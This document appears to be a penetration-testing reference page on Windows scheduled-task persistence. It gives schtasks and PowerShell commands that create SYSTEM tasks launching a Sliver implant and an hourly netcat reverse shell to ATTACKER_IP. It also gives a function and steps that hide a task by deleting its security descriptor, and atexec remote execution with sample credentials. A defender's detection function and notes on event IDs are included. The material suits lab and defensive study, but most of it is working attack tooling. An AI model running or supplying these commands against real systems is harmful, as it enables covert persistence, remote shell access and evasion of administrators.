
# Task Scheduler

### Schtasks Quick Reference

Create a task that fires once (here, to launch a Sliver implant), then remove it as soon as the callback arrives. `/sc ONCE` with only `/st` schedules the run for today at that time; if the time has already passed, schtasks warns that the task may not run, which is why the `/run` below is handy.

```
# run once as the current user, at highest integrity the user can get (/rl HIGHEST only elevates if the user is already an admin)
schtasks /create /tn "OneShotTask" /tr "C:\Users\htb-student\Desktop\sliver.exe" /sc ONCE /st 23:59 /rl HIGHEST /f
# if you already have local admin and want the implant as SYSTEM (/ru SYSTEM requires an elevated prompt)
schtasks /create /tn "OneShotTask" /tr "C:\Users\htb-student\Desktop\sliver.exe" /sc ONCE /st 20:53 /ru SYSTEM /rl HIGHEST /f
# fire it immediately (don't wait for the scheduled time)
schtasks /run /tn "OneShotTask"
# clean up the task once the implant has checked in
schtasks /delete /tn "OneShotTask" /f
```

```
# recurring task every 15 minutes (the spool\drivers\color path is a common user-writable location under C:\Windows)
SCHTASKS /create /sc minute /mo 15 /tn "Security Scan" /tr "C:\Windows\System32\spool\drivers\color\patch.exe"
# list every task the current user is allowed to see
SCHTASKS /query
# delete a task by name (the leading backslash is the root task folder)
schtasks /delete /tn "\Security Scan" /F
# query one task by name, in list format (shows run-as user, run level, triggers)
schtasks /query /fo LIST /v /tn "Daily Reboot"
```

* The most common way to schedule tasks is the built-in Windows Task Scheduler, driven from the command line with `schtasks`.
* Let's create a task that runs a reverse shell every hour. Because it uses `/ru SYSTEM`, this needs an elevated prompt; drop `/ru SYSTEM` to persist as the current user instead.

```
schtasks /create /sc hourly /mo 1 /tn TaskBackdoor /tr "c:\tools\nc64 -e cmd.exe ATTACKER_IP 4449" /ru SYSTEM
SUCCESS: The scheduled task "TaskBackdoor" has successfully been created.
```

* To check if our task was successfully created, we can use the following command:

```
schtasks /query /tn TaskBackdoor
Folder: \
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
TaskBackdoor                         5/25/2022 8:08:00 AM   Ready
```
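The same hourly SYSTEM backdoor, built with the `ScheduledTasks` PowerShell module instead of `schtasks.exe`, as an added example that is not part of the original page. It is useful where `schtasks.exe` command lines are monitored, and it shows the settings the one-liner hides (principal, run level, repetition, execution limit). The binary path, task name and `ATTACKER_IP` are placeholders, as on the page; the cmdlets and parameters are real (Windows 8 / Server 2012 and later).

```powershell
# Added example (not from the original page): the hourly SYSTEM backdoor above rebuilt with the
# ScheduledTasks module. $Binary, $Arguments and ATTACKER_IP are placeholders, as on the page.
#Requires -RunAsAdministrator
$TaskName  = 'TaskBackdoor'
$Binary    = 'C:\tools\nc64.exe'
$Arguments = '-e cmd.exe ATTACKER_IP 4449'

$action    = New-ScheduledTaskAction -Execute $Binary -Argument $Arguments

# /sc hourly equivalent: start a minute from now and repeat every hour. Without
# -RepetitionDuration the repetition is indefinite on Windows 10 / Server 2016 and later;
# Server 2012 needs an explicit -RepetitionDuration.
$trigger   = New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) `
                 -RepetitionInterval (New-TimeSpan -Hours 1)

# /ru SYSTEM /rl HIGHEST equivalent; registering a SYSTEM principal needs an elevated shell
$principal = New-ScheduledTaskPrincipal -UserId 'SYSTEM' -LogonType ServiceAccount -RunLevel Highest

# -Hidden only sets the "hidden" flag in the task XML: the Task Scheduler GUI skips it by default,
# but schtasks /query and Get-ScheduledTask still return it (the SD trick below is what actually
# hides a task). Battery switches keep it firing on laptops. The default 72h execution limit is
# left in place, so a long-lived shell is killed after three days unless the task fires again.
$settings  = New-ScheduledTaskSettingsSet -Hidden -AllowStartIfOnBatteries `
                 -DontStopIfGoingOnBatteries -MultipleInstances IgnoreNew

Register-ScheduledTask -TaskName $TaskName -Action $action -Trigger $trigger `
    -Principal $principal -Settings $settings -Force | Out-Null

# Same check as 'schtasks /query /tn TaskBackdoor', through the API
Get-ScheduledTask -TaskName $TaskName |
    Select-Object TaskName, State, @{n='RunAs'; e={$_.Principal.UserId}}, @{n='RunLevel'; e={$_.Principal.RunLevel}}
Get-ScheduledTaskInfo -TaskName $TaskName | Select-Object LastRunTime, NextRunTime, LastTaskResult

# Fire it immediately instead of waiting for the trigger; clean up once you no longer need it
Start-ScheduledTask -TaskName $TaskName
# Unregister-ScheduledTask -TaskName $TaskName -Confirm:$false
```

Registration through either path lands in the same places a defender looks: the task XML under `C:\Windows\System32\Tasks\`, the `TaskCache` registry keys covered in the next section, and a `4698` (task created) event when Audit Object Access / Other Object Access Events is enabled.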

### Making Our Task Invisible

* Our task should be up and running by now, but if the compromised user lists their scheduled tasks, our backdoor will stand out.
* To hide the scheduled task from every user on the system, we can delete its `Security Descriptor (SD)`. The security descriptor carries the DACL that states which users have what access to the scheduled task.
* If your user isn't allowed to query a scheduled task, you won't see it anymore: Windows only shows you the tasks you have permission to use.
* Deleting the SD is equivalent to denying every user access to the scheduled task, including administrators. The task itself keeps running on schedule.
* The security descriptors of all scheduled tasks are stored under `HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\`. There is a registry key for every task, under which a value named "`SD`" contains the security descriptor.
* **You can only erase the value if you hold `SYSTEM` privileges.** Administrators can read the key but not delete the value.
* To hide our task, let's delete the `SD` value for the "`TaskBackdoor`" task we created before. To do so, we will use `psexec` (which itself needs local admin) to open Regedit as SYSTEM:

```
c:\tools\pstools\PsExec64.exe -s -i regedit
```

* We will then delete the `SD` value under `HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\TaskBackdoor`:

<figure><img src="https://user-images.githubusercontent.com/75596877/181060133-34619dcd-33be-40f5-aa62-2fead6f2b4de.png" alt=""><figcaption></figcaption></figure>

* If we try to query our task again, the system will tell us there is no such task (the same error as for a task that never existed):

```
schtasks /query /tn TaskBackdoor
ERROR: The system cannot find the file specified.
```

* The task is hidden from the Task Scheduler API only. Its definition still exists as a `TaskCache\Tasks\{GUID}` registry key and as the XML file `C:\Windows\System32\Tasks\TaskBackdoor`, so a defender who compares those against what `schtasks /query` returns will find it.
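Both halves of the procedure above in PowerShell, as an added example that is not part of the original page: `Hide-TaskSD` performs the `SD` deletion the screenshot shows, without the Regedit GUI, and `Find-HiddenTask` is the check a defender runs for it. The function names are assumptions; the registry paths are the `TaskCache` keys the page cites, plus the `TaskCache\Tasks\{GUID}` keys that hold each task's definition and `Path`.

```powershell
# Added example, not from the original page.
# Hide-TaskSD: delete the SD value of a task (must run as SYSTEM, e.g. PsExec64.exe -s -i powershell.exe).
# Find-HiddenTask: defender-side check. Every task, hidden or not, still has a TaskCache\Tasks\{GUID}
# key whose 'Path' value names it; anything there that the Task Scheduler API does not return,
# or whose Tree entry has no SD value, is suspect.
$TaskCache = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache'

function Hide-TaskSD {
    param([Parameter(Mandatory)][string]$TaskName)   # e.g. 'TaskBackdoor' or 'Folder\TaskBackdoor'
    # Only SYSTEM may remove the value; fail loudly instead of with an access-denied from the registry
    $sid = [Security.Principal.WindowsIdentity]::GetCurrent().User.Value
    if ($sid -ne 'S-1-5-18') { throw "SD deletion needs SYSTEM; current SID is $sid" }
    $treeKey = Join-Path $TaskCache ('Tree\' + $TaskName.TrimStart('\'))
    if (-not (Test-Path $treeKey)) { throw "No Tree entry for '$TaskName'" }
    Remove-ItemProperty -Path $treeKey -Name 'SD' -ErrorAction Stop
    # From now on 'schtasks /query /tn <name>' reports: The system cannot find the file specified.
}

function Find-HiddenTask {
    # Run from an elevated shell. Build the set of task paths the API is willing to show,
    # then walk the registry cache, which lists every task regardless of its SD.
    $visible = @{}
    Get-ScheduledTask -ErrorAction SilentlyContinue |
        ForEach-Object { $visible[$_.TaskPath + $_.TaskName] = $true }   # e.g. '\TaskBackdoor'

    Get-ChildItem -Path (Join-Path $TaskCache 'Tasks') | ForEach-Object {
        $path = (Get-ItemProperty -Path $_.PSPath -Name 'Path' -ErrorAction SilentlyContinue).Path
        if (-not $path) { return }                          # not a task entry
        $treeKey = Join-Path $TaskCache ('Tree' + $path)    # $path starts with '\'
        $hasSD   = (Test-Path $treeKey) -and
                   ($null -ne (Get-ItemProperty -Path $treeKey -Name 'SD' -ErrorAction SilentlyContinue))
        $xml     = Join-Path $env:SystemRoot ('System32\Tasks' + $path)
        if (-not $visible.ContainsKey($path) -or -not $hasSD) {
            [pscustomobject]@{
                Task          = $path
                VisibleViaAPI = $visible.ContainsKey($path)
                HasSD         = $hasSD
                TaskGuid      = $_.PSChildName
                XmlOnDisk     = Test-Path $xml
            }
        }
    }
}

# Operator, from a SYSTEM shell:
# Hide-TaskSD -TaskName 'TaskBackdoor'
# Defender, from an elevated shell: list suspects, then read the cached definition of each
# Find-HiddenTask | Format-Table -AutoSize
# Get-Content "$env:SystemRoot\System32\Tasks\TaskBackdoor"
```

`Find-HiddenTask` compares against `Get-ScheduledTask` because that cmdlet goes through the same COM API as `schtasks /query`, so a task whose SD is gone is missing from it too. The registry hash table is case-insensitive by default, which matters because `Path` values and API paths can differ in case.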

### atexec Scheduled Task Execution

Impacket's `atexec.py` (also installed as `impacket-atexec`) uses the Task Scheduler service over SMB/DCE-RPC for remote command execution: it authenticates to the target, registers a scheduled task that runs `cmd.exe /C <command>` as SYSTEM with output redirected to a file under `%windir%\Temp`, triggers it, reads the output back over `ADMIN$`, then deletes both the task and the file. The credentials below are the page's example target.

```
python3 atexec.py CICADA/emily.oscars:'Q!3@Lp#M6b*7t*Vt'@10.10.11.35 dir
```

Because a task is created and deleted for every command, each run leaves task-creation and task-deletion events (4698/4699 where task auditing is on) and `Microsoft-Windows-TaskScheduler/Operational` entries, in addition to the SMB logon.
